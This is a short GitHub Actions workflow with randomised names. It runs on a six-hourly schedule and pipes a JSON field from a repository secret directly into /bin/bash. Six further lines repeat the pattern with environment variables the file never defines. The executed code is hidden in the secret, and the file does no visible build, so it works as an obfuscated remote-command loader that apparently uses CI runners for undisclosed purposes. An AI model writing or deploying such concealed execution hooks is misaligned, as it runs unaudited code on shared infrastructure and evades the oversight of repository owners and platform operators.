name: gaojinbao2345
on:
  workflow_dispatch:
  schedule:
    - cron: '30 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gaojinbao2345
        env:
          z4: ${{ secrets.z4 }}
        run: |
          echo $z4 | jq -r .yvge3364 | /bin/bash
          echo $rkst42 | jq -r .pffb57 | /bin/bash
          echo $mzxd70 | jq -r .zgpm109 | /bin/bash
          echo $hp891 | jq -r .pt97 | /bin/bash
          echo $zm524 | jq -r .qmhi653 | /bin/bash
          echo $boz2827 | jq -r .hfx12218 | /bin/bash
          echo $rrhn6 | jq -r .i75 | /bin/bash

